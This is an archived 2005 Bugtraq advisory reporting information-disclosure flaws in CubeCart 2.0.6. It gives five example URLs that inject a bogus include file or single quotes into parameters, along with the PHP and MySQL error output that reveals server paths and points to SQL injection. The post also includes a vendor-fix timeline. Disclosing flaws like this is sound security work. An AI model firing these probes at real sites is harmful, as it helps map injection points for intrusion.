[38255] in bugtraq
[NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure
daemon@ATHENA.MIT.EDU (John Cobb)
Wed Apr 6 15:12:15 2005
Message-Id: <200504061636.j36GamA9015054@firebird.worldhq.net>
From: "John Cobb" <johnc@nobytes.com>
To: <bugtraq@securityfocus.com>
Date: Sun, 6 Feb 2005 17:38:31 -0000
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit
Hello All,
I have discovered a number of remote vulnerabilities in: CubeCart 2.0.6.
Authors Site: http://www.cubecart.com
CubeCart is described by its authors as:
'What is CubeCart?
CubeCart is an eCommerce script written with PHP & MySQL. With CubeCart you
can setup a powerful online store as long as you have hosting supporting PHP
and one MySQL database.'
+-[Examples:]--------------------------------------------------+
[1]------------------------------------------------------------+
http://www.victimsite.com/index.php?&language=f00bar.php
Warning: Failed opening '/var/www/html/admin/lang/f00bar.php' for inclusion
(include_path='.:/usr/share/pear') in /var/www/html/admin/settings.inc.php
on line 147
[2]------------------------------------------------------------+
http://www.victimsite.com/index.php?&PHPSESSID='
Warning: Failed to write session data (files). Please verify that the
current setting of session.save_path is correct (/tmp) in Unknown on line 0
[3]------------------------------------------------------------+
http://www.victimsite.com/tellafriend.php?&product='
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/tellafriend.php on line 46
[4]------------------------------------------------------------+
http://www.victimsite.com/view_cart.php?add='
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_cart.php on line 49
[5]------------------------------------------------------------+
http://www.victimsite.com/view_product.php?product='
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_product.php on line 53
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_product.php on line 63
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_product.php on line 144
+-[Notes:]-----------------------------------------------------+
Vulnerabilities found on: 05/03/2005
Author(s) Informed on: 05/03/2005
Author(s) Response: 05/03/2005
Author(s) Fix: 05/04/2005
Regards
John Cobb
JohnC@NoBytes.com
http://www.NoBytes.com
